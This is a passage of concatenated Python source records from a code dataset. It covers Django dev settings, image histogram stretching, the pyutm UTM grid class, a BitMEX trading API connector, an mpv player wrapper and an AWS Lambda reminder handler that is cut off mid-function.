1)[-1]\n\n url = url.replace(':%s' % urlparse.urlparse(url).port, '')\n\n return url\n except:\n return\n\n","repo_name":"mpie/repo","sub_path":"plugin.video.doofree_old/resources/lib/resolvers/tusfiles.py","file_name":"tusfiles.py","file_ext":"py","file_size_in_byte":666,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"35960079531","text":"\"\"\"Development Settings\n\nAdds sensible defaults for developement of project\n- Enable DEBUG\n- Log outgoing emails to console\n- Enable Django Extensions\n- Enable Django Debug Toolbar\n- Use local caches\n- Enable livereloading\n\"\"\"\n\nfrom .common import * # noqa F405\nfrom .common import INSTALLED_APPS, env\n\n# DEBUG\n# ------------------------------------------------------------------------------\nDEBUG = env.bool('DJANGO_DEBUG', default=True)\nTEMPLATES[0]['OPTIONS']['debug'] = DEBUG # noqa: F405\n\nINTERNAL_IPS = ('127.0.0.1', '192.168.33.12', )\n\nALLOWED_HOSTS = ['*']\n\n\n# SECRET CONFIGURATION\n# ------------------------------------------------------------------------------\n# A secret key for this particular Django installation. Used in secret-key\n# hashing algorithms. 
Set this in your settings, or Django will complain\n# loudly.\n# See: https://docs.djangoproject.com/en/dev/ref/settings/#secret-key\n# Note: This key only used for development and testing.\nSECRET_KEY = env(\"DJANGO_SECRET_KEY\", default='CHANGEME!!!')\n\n# cors\n# --------------------------------------------------------------------------\nCORS_ORIGIN_WHITELIST = env.list('CORS_ORIGIN_WHITELIST', default=['http://localhost', 'http://localhost:8000'])\n\n# Mail settings\n# ------------------------------------------------------------------------------\nEMAIL_HOST = 'localhost'\nEMAIL_PORT = 1025\nEMAIL_BACKEND = env('DJANGO_EMAIL_BACKEND',\n default='django.core.mail.backends.console.EmailBackend')\n\n# CACHES\n# ------------------------------------------------------------------------------\nCACHES = {\n 'default': {\n 'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',\n 'LOCATION': ''\n }\n}\n\n# django-extensions (http://django-extensions.readthedocs.org/)\n# ------------------------------------------------------------------------------\nINSTALLED_APPS += ('django_extensions', )\n\n# LiveReload Support with devrecargar\n# ------------------------------------------------------------------------------\n# https://github.com/scottwoodall/django-devrecargar\nINSTALLED_APPS += ('devrecargar',)\n\nDEVRECARGAR_PATHS_TO_WATCH = [{\n 'path': str(APPS_DIR), # noqa: F405\n 'patterns': ['*.html', '*.js', '*.css', '*.scss'],\n}]\n\n# django-debug-toolbar\n# ------------------------------------------------------------------------------\nMIDDLEWARE += ['debug_toolbar.middleware.DebugToolbarMiddleware', ] # noqa: F405\nINSTALLED_APPS += ('debug_toolbar', )\n\nDEBUG_TOOLBAR_CONFIG = {\n 'DISABLE_PANELS': ['debug_toolbar.panels.redirects.RedirectsPanel', ],\n 'SHOW_TEMPLATE_CONTEXT': True,\n}\n\nDDF_DEFAULT_DATA_FIXTURE = 'nexus.base.utils.dynamic_fixture_utils.PatchedSequentialDataFixture'\n\n# This will expose all browsable api urls. 
For dev the default value is true\nAPI_DEBUG = env.bool('API_DEBUG', default=True)\n\n# MEDIA CONFIGURATION\n# ------------------------------------------------------------------------------\n\n# Media configuration to support deployment of media files while DEBUG=True or in development.\nMEDIA_URL = env(\"MEDIA_URL\", default=\"/media/\")\n","repo_name":"CuriousLearner/nexus","sub_path":"settings/development.py","file_name":"development.py","file_ext":"py","file_size_in_byte":3060,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"37"} {"seq_id":"42814342097","text":"# ——————————————————————————— stretch by picking parameters on the left and right sides: mode/std and 0.95%/t_n ——————————————————————————————————\n\nimport math\nimport numpy as np\nfrom stretchRange import stretchrange\n\npi = math.pi\ne = math.e\n\n\n# what are lamda and k, respectively?\ndef global_stretching(r_array, height, width, lamda, k):\n\n    length = height * width\n    R_rray = []\n    for i in range(height):\n        for j in range(width):\n            # flatten the image pixel values into one array in row-major order\n            R_rray.append(r_array[i][j])\n    # sort the pixel values in ascending order\n    R_rray.sort()\n\n    # drop the lowest 0.5%\n    I_min = R_rray[int(length / 200)]\n    # drop the highest 0.5%\n    I_max = R_rray[-int(length / 200)]\n\n    array_Global_histogram_stretching = np.zeros((height, width))\n    d = 4\n\n    # the most frequent pixel value is mode; SR_min is taken 0.5% from where pixel values first appear, and SR_max is the corresponding position on the right\n    SR_min, SR_max, mode = stretchrange(R_rray, height, width)\n    # added by the author\n    # I_max = SR_max\n    # added by the author\n    # I_min = SR_min\n\n    # O_lamda_min\n    DR_min = (1 - 0.655) * mode\n    # t_lamda_x\n    t_n = lamda ** d\n\n    # left and right bounds of miu_lamda\n    O_max_left = SR_max * t_n * k / mode\n    O_max_right = 255 * t_n * k / mode\n    # left-right interval of miu_lamda\n    Dif = O_max_right - O_max_left\n    # if Dif >= 1.526:\n    if Dif >= 1:\n        sum = 0\n        # for i in range(2, int(Dif + 1)):\n        for i in range(1, int(Dif + 1)):\n            # sum = sum + ((i - 1.526) * 0.665 * mode + mode) / (t_n * k)\n            sum = sum + (1.526 + i) * mode / (t_n * k)\n        # O_lamda_max\n        DR_max = sum / int(Dif)\n\n        for i in range(0, height):\n            for j in range(0, width):\n                if r_array[i][j] < I_min:\n\n                    p_out = (r_array[i][j] - I_min) * (DR_min / I_min) + I_min\n                    array_Global_histogram_stretching[i][j] = p_out\n                elif r_array[i][j] > I_max:\n                    p_out = (r_array[i][j] - DR_max) * (DR_max / I_max) + I_max\n                    array_Global_histogram_stretching[i][j] = p_out\n                else:\n                    p_out = int((r_array[i][j] - I_min) * ((255 - I_min) / (I_max - I_min))) + I_min\n                    array_Global_histogram_stretching[i][j] = p_out\n    else:\n\n        for i in range(0, height):\n            for j in range(0, width):\n                if r_array[i][j] < I_min:\n\n                    p_out = (r_array[i][j] - np.min(r_array)) * (DR_min / np.min(r_array)) + np.min(r_array)\n                    array_Global_histogram_stretching[i][j] = p_out\n                else:\n                    p_out = int((r_array[i][j] - I_min) * ((255 - DR_min) / (I_max - I_min))) + DR_min\n                    array_Global_histogram_stretching[i][j] = p_out\n\n    return 
sceneRadiance\n","repo_name":"Cinderella1001/Liver_Classfication_and_enhancement-main","sub_path":"RGHS/relativeglobalhistogramstretching.py","file_name":"relativeglobalhistogramstretching.py","file_ext":"py","file_size_in_byte":3338,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"17765371450","text":"import pyproj\n\nimport pyutm.data as data\nimport pyutm.locate as locate\n\n\nclass Grid:\n \"\"\"\n This class serves as the API for pyutm, with three main public methods: write_refs(), write_uids() and write_utms().\n \"\"\"\n def __init__(self, data, columns=None, epsg=4326):\n \"\"\"\n Validates, loads and optionally transforms the input data. Assumes coordinates are in EPSG:4326.\n :param data: list or string, data or file path to data\n :param columns: tuple or list of length 2, default=None, column names containing X and Y coordinates,\n in that order\n :param epsg: int, default=4326, European Petroleum Survey Group number for the input coordinate system\n \"\"\"\n self._input_data = data\n self._input_columns = columns\n self._input_datatype = None\n self._shape_type = None\n self._data = None\n self._columns = None\n self._epsg = epsg\n self._error_message = None\n\n # Load data\n self._set_columns()\n self._set_data()\n # Transform coordinates to EPSG 4326, if necessary\n if self._epsg != 4326:\n self._transform_coords()\n\n if self._error_message:\n self._error(self._error_message)\n\n def _set_columns(self):\n \"\"\"\n Validates the columns parameter: only tuples and lists of length 2 are considered valid.\n An invalid columns parameter defaults to None.\n \"\"\"\n if isinstance(self._input_columns, (tuple, list)):\n if len(self._input_columns) == 2:\n self._columns = tuple(self._input_columns)\n else:\n self._columns = None\n\n def _set_data(self):\n \"\"\"\n Loads the data based on type. 
0: tuple or list, 1: CSV, or 2: SHP file.\n \"\"\"\n # Tuples or lists must contain at least two elements\n if isinstance(self._input_data, (tuple, list)) and (len(self._input_data) > 1):\n self._input_datatype = 0\n self._data, self._error_message = data.from_list(self._input_data)\n else:\n try:\n if self._input_data.endswith('.csv') and self._columns:\n self._input_datatype = 1\n self._data, self._error_message = data.from_csv(self._input_data, self._columns)\n elif self._input_data.endswith('.shp'):\n self._input_datatype = 2\n self._data, self._shape_type, self._error_message = data.from_shp(self._input_data)\n # Everything else raises an error\n else:\n raise AttributeError\n except AttributeError:\n self._error_message = 'Invalid parameter(s): Grid(data={}, columns={}, epsg={})'.format(\n repr(self._input_data), repr(self._input_columns), self._epsg)\n\n def _transform_coords(self):\n \"\"\"\n Reprojects coordinates into longitude and latitude.\n \"\"\"\n try:\n p = pyproj.Proj(init='epsg:{}'.format(self._epsg))\n self._data[0], self._data[1] = p(self._data[0].values, self._data[1].values, inverse=True)\n except RuntimeError:\n self._error_message = 'EPSG:{} not found'.format(self._epsg)\n\n def _get_grid_refs(self, column, precision):\n \"\"\"\n Uses the locate module to compute a grid reference for every value in the input data.\n :param column: string, column name of the grid references\n :param precision: int, desired precision of the grid references\n \"\"\"\n try:\n self._data[column] = [locate.Point(coord[0], coord[1], precision).grid_ref for coord in self._data.values]\n except (KeyError, ValueError):\n self._error('Invalid column name')\n\n def _get_uids(self, grid_refs, column, prefix, prefix_column, gzd, k100, delimiter):\n \"\"\"\n Uses the locate module to compute a Unique ID (UID) for every value in the input data.\n :param grid_refs: dataframe, grid references to be modified\n :param column: string, column name of the UIDs\n :param prefix: string, characters added to the beginning of the UIDs\n :param prefix_column: Pandas Series, column name containing prefix values for the UIDs\n :param gzd: whether the Grid Zone Designation should be included in the UIDs\n :param k100: boolean, whether the 100k meter grid reference should be included in the UIDs\n :param delimiter: string, delimiter of the UIDs\n \"\"\"\n if grid_refs.any():\n self._data[column] = locate.UID(grid_refs, prefix, prefix_column, gzd, k100, delimiter).uids\n else:\n self._data[column] = None\n\n def _get_utm_coords(self, column):\n \"\"\"\n Uses the locate module to compute a UTM coordinate for every value in the input data.\n :param column: string, column name of the UTM coordinates\n \"\"\"\n try:\n self._data[column] = [locate.Point(coord[0], coord[1]).utm_coord for coord in self._data.values]\n except (KeyError, ValueError):\n self._error('Invalid column name')\n\n def _get_prefix_column(self, prefix_column):\n \"\"\"\n Uses the data module to retrieve prefix values if stored in the original data file.\n :param prefix_column: string or list, column name containing prefix values for the UID\n \"\"\"\n try:\n prefixes = None\n # If input was a string, wrap it in a list\n if isinstance(prefix_column, str):\n prefix_column = [prefix_column]\n # Get column data from the original data files\n if self._input_datatype == 1:\n prefixes, error_message = data.from_csv(self._input_data, prefix_column, prefix=True)\n elif self._input_datatype == 2:\n prefixes, shape_type, error_message = 
data.from_shp(self._input_data, prefix_column)\n else:\n return prefixes\n # Call the error function directly if something went wrong\n if error_message:\n self._error(error_message)\n else:\n return prefixes.iloc[:, 0]\n except (KeyError, ValueError, AttributeError):\n self._error('Invalid column name')\n\n def _write_data(self, fname, column, uid=False):\n \"\"\"\n Uses the data module to write data to a list or file, based on the data type.\n Always returns a nested list of the computed data.\n :param fname: string, file name of the output data\n :param column: string, column name for the data\n :return: list, nested list in [X, Y, data] format\n \"\"\"\n if self._input_datatype == 1:\n data.to_csv(fname, column, self._input_data, self._data)\n elif self._input_datatype == 2:\n data.to_shp(fname, column, self._input_data, self._data, self._shape_type, uid)\n return data.to_list(self._data, column)\n\n def write_refs(self, fname=None, column='GRID_REF', precision=10):\n \"\"\"\n Gets the grid references for a set of points and writes them to the specified file,\n then returns a nested list of the coordinates and their grid references.\n If no file name is given, returns a nested list without writing to a file.\n :param fname: string, default=None, file name for the output data\n :param column: string, default='GRID_REF', column name for the grid references\n :param precision: int, default=10, desired precision of the grid references\n :return: list, nested list in [X, Y, grid reference] format\n \"\"\"\n self._get_grid_refs(column, precision)\n return self._write_data(fname, column)\n\n def write_uids(self, fname=None, column='UID_REF', precision=10, prefix=None, prefix_column=None, gzd=True,\n k100=True, delimiter='-'):\n \"\"\"\n Gets the Unique IDs (UID) for a set of points and writes them to the specified file,\n then returns a nested list of the coordinates and their UID.\n If no file name is given, returns a nested list without writing to a file.\n :param fname: string, default=None, file name for the output data\n :param column: string, default='UID_REF', column name for the UIDs\n :param precision: int, default=10, desired precision of the UIDs\n :param prefix: string, default=None, characters added to the beginning of the UIDs\n :param prefix_column: Pandas Series, default=None, column name containing prefix values for the UIDs\n :param gzd: boolean, default=True, whether the Grid Zone Designation should be included in the UIDs\n :param k100: boolean, default=True, whether the 100k meter grid reference should be included in the UIDs\n :param delimiter: string, default='-', delimiter of the UIDs\n :return: list, nested list in [X, Y, UID] format\n \"\"\"\n ref_column = 'GRID_REF'\n if prefix_column:\n prefix_column = self._get_prefix_column(prefix_column)\n self._get_grid_refs(ref_column, precision)\n # Select only the relevant column from the dataframe\n grid_refs = self._data[ref_column]\n self._get_uids(grid_refs, column, prefix, prefix_column, gzd, k100, delimiter)\n return self._write_data(fname, column, uid=True)\n\n def write_utms(self, fname=None, column='UTM_COORD'):\n \"\"\"\n Gets the UTM coordinates for a set of points and writes them to the specified file,\n then returns a nested list of the coordinates and their grid reference.\n If no file name is given, returns a nested list without writing to a file.\n :param fname: string, default=None, file name for the output data\n :param column: string, default='UTM_COORD', column name for the UTM coordinates\n :return: 
list, nested list in [X, Y, UTM coordinate] format\n        \"\"\"\n        self._get_utm_coords(column)\n        return self._write_data(fname, column)\n\n    @staticmethod\n    def _error(message):\n        \"\"\"\n        Prints an error message then exits the script with an exit status of 1.\n        :param message: string, error message to print\n        \"\"\"\n        # Only import sys for errors\n        import sys\n        print('Error creating Grid object: {}'.format(message))\n        sys.exit(1)\n","repo_name":"FREAC/PyUTM","sub_path":"pyutm/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":10353,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"37"} {"seq_id":"28138000750","text":"import unittest\nimport sys\nsys.path.append('../')\nimport send_email\n\n\nclass TestRun(unittest.TestCase):\n\n    def test_send_email(self):\n        result = send_email.send_message(\"test\",\"test\",\"cedzkii81@gmail.com\")\n        self.assertEqual(None,result)\n\nif __name__ == '__main__':\n    unittest.main()\n","repo_name":"akosicedzkii/flask_api_weee","sub_path":"app/test_cases/run_test.py","file_name":"run_test.py","file_ext":"py","file_size_in_byte":298,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} {"seq_id":"38252901191","text":"\"\"\"BitMEX API Connector.\"\"\"\nfrom __future__ import absolute_import\nimport requests\nfrom time import sleep\nimport json\nimport base64\nimport uuid\nimport logging\nfrom market_maker.auth import AccessTokenAuth, APIKeyAuthWithExpires\nfrom market_maker.utils import constants, errors\nfrom market_maker.ws.ws_thread import BitMEXWebsocket\n\n\n# https://www.bitmex.com/api/explorer/\nclass BitMEX(object):\n\n    \"\"\"BitMEX API Connector.\"\"\"\n\n    def __init__(self, base_url=None, symbol=None, login=None, password=None, otpToken=None,\n                 apiKey=None, apiSecret=None, orderIDPrefix='mm_bitmex_', shouldWSAuth=True):\n        \"\"\"Init connector.\"\"\"\n        self.logger = logging.getLogger('root')\n        self.base_url = base_url\n        self.symbol = symbol\n        self.token = None\n        # User/pass auth is no longer supported\n        if (login or password or otpToken):\n            raise Exception(\"User/password authentication is no longer supported via the API. Please use \" +\n                            \"an API key. 
You can generate one at https://www.bitmex.com/app/apiKeys\")\n self.apiKey = apiKey\n self.apiSecret = apiSecret\n if len(orderIDPrefix) > 13:\n raise ValueError(\"settings.ORDERID_PREFIX must be at most 13 characters long!\")\n self.orderIDPrefix = orderIDPrefix\n\n # Prepare HTTPS session\n self.session = requests.Session()\n # These headers are always sent\n self.session.headers.update({'user-agent': 'liquidbot-' + constants.VERSION})\n self.session.headers.update({'content-type': 'application/json'})\n self.session.headers.update({'accept': 'application/json'})\n\n # Create websocket for streaming data\n self.ws = BitMEXWebsocket()\n self.ws.connect(base_url, symbol, shouldAuth=shouldWSAuth)\n\n #\n # Public methods\n #\n def ticker_data(self, symbol):\n \"\"\"Get ticker data.\"\"\"\n return self.ws.get_ticker(symbol)\n\n def instrument(self, symbol):\n \"\"\"Get an instrument's details.\"\"\"\n return self.ws.get_instrument(symbol)\n\n def market_depth(self, symbol):\n \"\"\"Get market depth / orderbook.\"\"\"\n return self.ws.market_depth(symbol)\n\n def recent_trades(self, symbol):\n \"\"\"Get recent trades.\n\n Returns\n -------\n A list of dicts:\n {u'amount': 60,\n u'date': 1306775375,\n u'price': 8.7401099999999996,\n u'tid': u'93842'},\n\n \"\"\"\n return self.ws.recent_trades(symbol)\n\n #\n # Authentication required methods\n #\n def authentication_required(function):\n \"\"\"Annotation for methods that require auth.\"\"\"\n def wrapped(self, *args, **kwargs):\n if not (self.apiKey):\n msg = \"You must be authenticated to use this method\"\n raise errors.AuthenticationError(msg)\n else:\n return function(self, *args, **kwargs)\n return wrapped\n\n @authentication_required\n def funds(self):\n \"\"\"Get your current balance.\"\"\"\n return self.ws.funds()\n\n @authentication_required\n def position(self, symbol):\n \"\"\"Get your open position.\"\"\"\n return self.ws.position(symbol)\n\n @authentication_required\n def buy(self, quantity, price):\n \"\"\"Place a buy order.\n\n Returns order object. ID: orderID\n \"\"\"\n return self.place_order(quantity, price)\n\n @authentication_required\n def sell(self, quantity, price):\n \"\"\"Place a sell order.\n\n Returns order object. 
ID: orderID\n \"\"\"\n return self.place_order(-quantity, price)\n\n @authentication_required\n def place_order(self, quantity, price):\n \"\"\"Place an order.\"\"\"\n if price < 0:\n raise Exception(\"Price must be positive.\")\n\n endpoint = \"order\"\n # Generate a unique clOrdID with our prefix so we can identify it.\n clOrdID = self.orderIDPrefix + base64.b64encode(uuid.uuid4().bytes).decode('utf-8').rstrip('=\\n')\n postdict = {\n 'symbol': self.symbol,\n 'orderQty': quantity,\n 'price': price,\n 'clOrdID': clOrdID,\n 'execInst': 'ParticipateDoNotInitiate'\n }\n return self._curl_bitmex(api=endpoint, postdict=postdict, verb=\"POST\")\n\n @authentication_required\n def amend_bulk_orders(self, orders):\n \"\"\"Amend multiple orders.\"\"\"\n return self._curl_bitmex(api='order/bulk', postdict={'orders': orders}, verb='PUT', rethrow_errors=True)\n\n @authentication_required\n def create_bulk_orders(self, orders):\n \"\"\"Create multiple orders.\"\"\"\n for order in orders:\n order['clOrdID'] = self.orderIDPrefix + base64.b64encode(uuid.uuid4().bytes).decode('utf-8').rstrip('=\\n')\n order['symbol'] = self.symbol\n order['execInst'] = 'ParticipateDoNotInitiate'\n return self._curl_bitmex(api='order/bulk', postdict={'orders': orders}, verb='POST')\n\n @authentication_required\n def open_orders(self):\n \"\"\"Get open orders.\"\"\"\n return self.ws.open_orders(self.orderIDPrefix)\n\n @authentication_required\n def http_open_orders(self):\n \"\"\"Get open orders via HTTP. Used on close to ensure we catch them all.\"\"\"\n api = \"order\"\n orders = self._curl_bitmex(\n api=api,\n query={'filter': json.dumps({'ordStatus.isTerminated': False, 'symbol': self.symbol})},\n verb=\"GET\"\n )\n # Only return orders that start with our clOrdID prefix.\n return [o for o in orders if str(o['clOrdID']).startswith(self.orderIDPrefix)]\n\n @authentication_required\n def cancel(self, orderID):\n \"\"\"Cancel an existing order.\"\"\"\n api = \"order\"\n postdict = {\n 'orderID': orderID,\n }\n return self._curl_bitmex(api=api, postdict=postdict, verb=\"DELETE\")\n\n @authentication_required\n def withdraw(self, amount, fee, address):\n api = \"user/requestWithdrawal\"\n postdict = {\n 'amount': amount,\n 'fee': fee,\n 'currency': 'XBt',\n 'address': address\n }\n return self._curl_bitmex(api=api, postdict=postdict, verb=\"POST\")\n\n def _curl_bitmex(self, api, query=None, postdict=None, timeout=3, verb=None, rethrow_errors=False):\n \"\"\"Send a request to BitMEX Servers.\"\"\"\n # Handle URL\n url = self.base_url + api\n\n # Default to POST if data is attached, GET otherwise\n if not verb:\n verb = 'POST' if postdict else 'GET'\n\n # Auth: Use Access Token by default, API Key/Secret if provided\n auth = AccessTokenAuth(self.token)\n if self.apiKey:\n auth = APIKeyAuthWithExpires(self.apiKey, self.apiSecret)\n\n def maybe_exit(e):\n if rethrow_errors:\n raise e\n else:\n exit(1)\n\n # Make the request\n try:\n req = requests.Request(verb, url, json=postdict, auth=auth, params=query)\n prepped = self.session.prepare_request(req)\n response = self.session.send(prepped, timeout=timeout)\n # Make non-200s throw\n response.raise_for_status()\n\n except requests.exceptions.HTTPError as e:\n # 401 - Auth error. 
This is fatal with API keys.\n if response.status_code == 401:\n self.logger.error(\"Login information or API Key incorrect, please check and restart.\")\n self.logger.error(\"Error: \" + response.text)\n if postdict:\n self.logger.error(postdict)\n # Always exit, even if rethrow_errors, because this is fatal\n exit(1)\n return self._curl_bitmex(api, query, postdict, timeout, verb)\n\n # 404, can be thrown if order canceled does not exist.\n elif response.status_code == 404:\n if verb == 'DELETE':\n self.logger.error(\"Order not found: %s\" % postdict['orderID'])\n return\n self.logger.error(\"Unable to contact the BitMEX API (404). \" +\n \"Request: %s \\n %s\" % (url, json.dumps(postdict)))\n maybe_exit(e)\n\n # 429, ratelimit\n elif response.status_code == 429:\n self.logger.error(\"Ratelimited on current request. Sleeping, then trying again. Try fewer \" +\n \"order pairs or contact support@bitmex.com to raise your limits. \" +\n \"Request: %s \\n %s\" % (url, json.dumps(postdict)))\n sleep(1)\n return self._curl_bitmex(api, query, postdict, timeout, verb)\n\n # 503 - BitMEX temporary downtime, likely due to a deploy. Try again\n elif response.status_code == 503:\n self.logger.warning(\"Unable to contact the BitMEX API (503), retrying. \" +\n \"Request: %s \\n %s\" % (url, json.dumps(postdict)))\n sleep(1)\n return self._curl_bitmex(api, query, postdict, timeout, verb)\n\n # Duplicate clOrdID: that's fine, probably a deploy, go get the order and return it\n elif (response.status_code == 400 and\n response.json()['error'] and\n response.json()['error']['message'] == 'Duplicate clOrdID'):\n\n order = self._curl_bitmex('/order',\n query={'filter': json.dumps({'clOrdID': postdict['clOrdID']})},\n verb='GET')[0]\n if (\n order['orderQty'] != postdict['quantity'] or\n order['price'] != postdict['price'] or\n order['symbol'] != postdict['symbol']):\n raise Exception('Attempted to recover from duplicate clOrdID, but order returned from API ' +\n 'did not match POST.\\nPOST data: %s\\nReturned order: %s' % (\n json.dumps(postdict), json.dumps(order)))\n # All good\n return order\n\n # Unknown Error\n else:\n self.logger.error(\"Unhandled Error: %s: %s\" % (e, response.text))\n self.logger.error(\"Endpoint was: %s %s: %s\" % (verb, api, json.dumps(postdict)))\n maybe_exit(e)\n\n except requests.exceptions.Timeout as e:\n # Timeout, re-run this request\n self.logger.warning(\"Timed out, retrying...\")\n return self._curl_bitmex(api, query, postdict, timeout, verb)\n\n except requests.exceptions.ConnectionError as e:\n self.logger.warning(\"Unable to contact the BitMEX API (ConnectionError). Please check the URL. Retrying. 
\" +\n \"Request: %s \\n %s\" % (url, json.dumps(postdict)))\n sleep(1)\n return self._curl_bitmex(api, query, postdict, timeout, verb)\n\n return response.json()\n","repo_name":"Behappy123/market-maker","sub_path":"market_maker/bitmex.py","file_name":"bitmex.py","file_ext":"py","file_size_in_byte":11089,"program_lang":"python","lang":"en","doc_type":"code","stars":230,"dataset":"github-code","pt":"37"} +{"seq_id":"3553205841","text":"\n\nclass Player():\n _isPlaying = False\n\n def isPlaying(self):\n return self._isPlaying\n\n def play(self, args):\n path = args.pop('path', None)\n print(\"try to load player\")\n self.command('loadfile', path)\n print(\"player started\")\n self.isPlaying = True\n\n def togglePlayPause(self):\n tmp = self.get_property(\"pause\")\n if tmp:\n self.set_property(\"pause\", False)\n else:\n self.set_property(\"pause\", True)\n\n def seek(self, position):\n self.command(\"seek\", position, \"absolute\")\n\n\n\nif __name__ == \"__main__\":\n ply = MpvPlayer()\n print(\"start player\")\n ply.play({'path':'C:\\\\tmp\\\\ishaPi2\\\\videos\\\\a.mp4'})\n","repo_name":"thomaskhub/pi-player","sub_path":"mpv_player_wrapper.py","file_name":"mpv_player_wrapper.py","file_ext":"py","file_size_in_byte":712,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"30325600306","text":"import json\nimport boto3\nimport logging\nimport os\nimport time\nimport uuid\nfrom datetime import datetime, timedelta\nfrom boto3.dynamodb.conditions import Key, Attr\n#from reminder_app.api_reminder_handler import validate_field\n#import reminder_app.DecimalEncoder as DecimalEncoder\nfrom botocore.exceptions import ClientError\n#from reminder_app.date_utils import isostr_to_datetime, datetime_to_isostr\n\n#TODO PUT COMMON CODE IN LAYERS\ndef isostr_to_datetime(date_string):\n print(\"From Datestr:\",date_string)\n dtval = datetime.strptime(date_string, '%Y-%m-%dT%H:%M:%S.%f%z').replace(tzinfo=None)\n print (\"To Datetime:\",dtval)\n return dtval\n\ndef datetime_to_isostr(date):\n print(\"From Datetime:\",date)\n #FIXME - handle propertly\n dt = date.strftime('%Y-%m-%dT%H:%M:%S.%f%Z')+'Z'\n print(\"To Datestr:\",dt)\n return dt\n\ndef validate_field(data,fieldName):\n if fieldName not in data:\n logging.error(\"Validation Failed\")\n raise Exception(\"Couldn't create the reminder item - {fieldName} missing\".format(fieldName = fieldName))\n\ndef validate_notify_date_time(data):\n current_ts = datetime.utcnow()\n logging.info(\"Current ts:\",current_ts)\n print(\"Current ts:\",current_ts)\n date_ts = isostr_to_datetime(data['notify_date_time'])\n logging.info(\"Reminder ts:\",date_ts)\n print(\"Reminder ts:\",date_ts)\n if current_ts > date_ts:\n logging.error(\"Validation Failed: Reminder in the past\")\n raise Exception(\"Reminder {date_ts} in the past\".format(date_ts=date_ts))\n\n diff = (date_ts - current_ts)\n print(\"diff ts:\",diff.seconds)\n\n delay_params_list = ssm.get_parameters_by_path(Path=param_path,Recursive=False)['Parameters']\n\n logging.debug(delay_params_list)\n\n delay_params_dict = {param['Name'] : param for param in delay_params_list}\n \n min_delay_param = int(delay_params_dict[param_path+\"/min_delay_param\"]['Value'])\n max_delay_param = int(delay_params_dict[param_path+\"/max_delay_param\"]['Value'])\n\n delay_seconds = int(diff.seconds)\n if (min_delay_param > delay_seconds) or (delay_seconds > max_delay_param):\n logging.error(\"Validation Failed\")\n raise Exception(\"Reminder should be at least {min_delay_param} 
mins in the future and less than {max_delay_param} mins in the future\".format(min_delay_param=min_delay_param,max_delay_param=max_delay_param))\n\n\n\n\ndynamodb = boto3.resource('dynamodb', region_name='us-east-1')\nssm = boto3.client('ssm', region_name=\"us-east-1\")\nparam_path= '/{app_name}/{stage}'.format(app_name=os.environ['APP_NAME'],stage=os.environ['STAGE'])\n#SNS Client for SMS\nsns = boto3.client('sns')\n#SES Client for Emails\nses = boto3.client('ses')\nCHARSET = \"UTF-8\"\n\ntable = dynamodb.Table('{stack_name}-RemindersTable'.format(stack_name=os.environ['STACK_NAME']))\n\n# Gets triggered by step function\n# Check if reminder is still in pending state and the execution date is in the past\n# Check mode email or sms and send out email and call appropriate method\n# retry_count +=1\n# Create event to check if reminder is in acknowledged in 15 mins else mark as pending self again\n# if retry_count >= {MAX_RETRIES} mark the reminder as unacknowledged in dynamoDB\n# NOT USING CLOUD WATCH EVENTS AS \ndef execute_reminder(event, context):\n #data = json.loads(event['body'],strict=False)\n data = event\n logging.info(\"Event: \"+str(event))\n print(\"Event:>> \"+str(event))\n validate_field(data,'reminder_id')\n timestamp = int(time.time() * 1000)\n #fetch the reminder\n try:\n response = table.query(\n KeyConditionExpression=Key('reminder_id').eq(data['reminder_id'])\n )\n except ClientError as e:\n print(e.response['Error']['Message'])\n logging.info(e.response['Error']['Message'])\n else:\n item = response['Items'][0]\n logging.info(\"GetItem succeeded:\")\n print(\"GetItem succeeded:\")\n logging.info(item)\n\n #if state of reminder is not pending return to_execute as false\n if item['state'] != 'Pending':\n logging.info('Reminder:{reminderId} is not pending'.format(reminderId=data['reminder_id']))\n print('Reminder:{reminderId} is not pending'.format(reminderId=data['reminder_id']))\n return {\n 'to_execute':'false'\n }\n\n #else if retry_count > max_retry_count then mark state as Unacknowledged and return to_execute as false\n app_params_list = ssm.get_parameters_by_path(Path=param_path,Recursive=False)['Parameters']\n logging.debug(app_params_list)\n delay_params_dict = {param['Name'] : param for param in app_params_list}\n \n max_retry_count = int(delay_params_dict[param_path+\"/max_retry_count\"]['Value'])\n print(max_retry_count)\n if item['retry_count'] > max_retry_count:\n logging.info('Reminder:{reminderId} has exceeded max retry counts'.format(reminderId=data['reminder_id']))\n print('Reminder:{reminderId} has exceeded max retry counts'.format(reminderId=data['reminder_id']))\n #mark state as Unacknowledged\n result = table.update_item(\n Key={\n 'reminder_id': data['reminder_id']\n },\n UpdateExpression=\"SET state= :state, updated_at= :updated_at\",\n ExpressionAttributeValues={\n ':state' : 'Unacknowledged',\n ':updated_at':timestamp\n }\n )\n\n # return to_execute as false\n return {\n 'to_execute':'false'\n }\n\n #else if notify_date_time is in the future return with to_execute as true + reminder_id + notify_date_time\n date_ts = isostr_to_datetime(item['notify_date_time'])\n if date_ts > datetime.utcnow():\n logging.info('Reminder:{reminderId} is scheduled for the future - skipping` '.format(reminderId=data['reminder_id']))\n return {\n 'to_execute':'true',\n 'reminder_id':item['reminder_id'],\n 'notify_date_time':item['notify_date_time']\n }\n\n #else send notification based on notify_by and return (dont update state)\n if item['notify_by']['type'] == 'SMS' 
